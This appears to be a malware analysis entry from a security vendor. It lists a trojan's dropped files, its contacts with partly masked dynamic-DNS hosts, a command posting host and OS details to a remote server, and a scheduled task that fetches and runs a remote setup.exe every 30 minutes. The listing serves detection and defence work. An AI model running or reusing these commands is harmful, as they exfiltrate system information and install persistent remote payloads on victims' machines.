Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im Cookie.exe
- %TEMP%\7ZipSfx.000\Cookies.cmd
- %TEMP%\7ZipSfx.000\Cookie.exe
- %TEMP%\7ZipSfx.000\dPbHUhQ
- %TEMP%\7ZipSfx.000\richtime.exe
- %APPDATA%\Microsoft\IE\ie_cash.exe
- 'da#####ice.zapto.org':80
- http://da#####ice.zapto.org/
- DNS ASK da#####ice.zapto.org
- ClassName: '' WindowName: ''
- '%TEMP%\7ZipSfx.000\Cookie.exe' --post-data="versiya=arm_14.11&comp=CRNJEUFU&id=CRNJEUFU_88E6680F&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: ...
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\Cookies.cmd" "
- '<SYSTEM32>\cmd.exe' /c vol c:
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\schtasks.exe' /Create /SC MINUTE /MO 30 /F /tn ie_cash_88E6680F_01 /tr "%APPDATA%\Microsoft\IE\ie_cash.exe -b -c -t 5 'http://bi####min.ddns.net/CRNJEUFU_88E6680F/setup.exe' -P '%HOMEPATH%'"